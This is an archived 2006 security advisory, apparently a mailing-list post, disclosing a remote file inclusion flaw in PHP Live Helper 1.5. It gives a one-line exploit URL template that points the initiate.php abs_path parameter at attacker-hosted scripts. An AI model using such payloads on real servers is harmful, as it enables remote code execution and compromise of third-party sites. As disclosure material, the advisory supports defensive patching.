PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities

selfar2002 Mon, 19 Jun 2006 11:29:48 -0700

---------------------------------------------------------------------------


PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By SnIpEr_SA

Author : SnIpEr_SA

Remote : Yes 

Local : No 

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHP Live Helper

version : 1.5 and last version

URL :http://www.live-helper.com/

... 

------------------------------------------------------------------ 

Exploit:

~~~~~~~~ 

# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]

--------------------------------------------------------------------------- 

*/

Contact:

~~~~~~~~

SnIpEr_SA

E-mail: [EMAIL PROTECTED]

E-mail: SnIpEr.SA[at]hotMail[dot]com

Homepage: http://www.3asfh.net/ & http://www.lezr.com/

Greetz: All My Frind

/* 

-------------------------------- [ END ] ----------------------------------

PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities

Reply via email to